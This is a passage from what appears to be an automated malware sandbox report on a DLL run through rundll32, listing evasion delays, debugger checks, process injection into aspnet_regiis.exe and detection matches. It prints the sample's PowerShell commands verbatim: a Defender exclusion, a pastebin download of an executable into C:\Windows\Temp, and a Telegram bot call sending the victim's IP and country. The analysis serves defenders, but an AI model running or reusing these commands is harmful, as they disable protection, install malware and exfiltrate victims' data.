                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 5457 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 8104Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 4297 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep count: 3387 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep count: 3666 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep count: 3355 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 3290 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 2337 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4852Thread sleep count: 4801 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936Thread sleep count: 1963 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 5095 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 1668 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948Thread sleep count: 5382 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep count: 2532 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeLast function: Thread delayed
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000013.00000002.1931492047.0000000006C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                      Source: powershell.exe, 00000028.00000002.2456306228.0000000007881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                      Source: powershell.exe, 00000011.00000002.1912945547.00000000077CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp://www.microsoft.com/pkiops/certs/Microsoft%20Time-Stamp%20PCA%202010(1).crt0
                      Source: powershell.exe, 00000022.00000002.2298356407.0000000007A8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2332832098.0000000007C89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2426124372.0000000006F07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess queried: DebugPort
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess queried: DebugPort
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeProcess queried: DebugPort
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeProcess queried: DebugPort
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025DFAC0 LdrInitializeThunk,26_2_025DFAC0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C0160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_68C0160A
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C02D95 mov eax, dword ptr fs:[00000030h]24_2_68C02D95
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C03F69 mov eax, dword ptr fs:[00000030h]24_2_68C03F69
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C05B7C GetProcessHeap,24_2_68C05B7C
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C01131 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_68C01131
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C0160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_68C0160A
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C03F9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_68C03F9A
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi32_7516.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi32_7664.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6628, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7188, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs, type: DROPPED
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A0000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A0000 value starts with: 4D5A
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A0000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A1000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E4000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E7000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F8000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F9000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A1000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E4000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E7000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F8000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F9000
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3C4008
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Temp\zbjnkzvo4cc.exe "C:\Windows\Temp\zbjnkzvo4cc.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Temp\mxtvcgq32fe.exe "C:\Windows\Temp\mxtvcgq32fe.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"Jump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\zbjnkzvo4cc.exe')"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\mxtvcgq32fe.exe')"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\zbjnkzvo4cc.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\mxtvcgq32fe.exe')"Jump to behavior
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C017D8 cpuid 24_2_68C017D8
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SystemCoreHelper.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
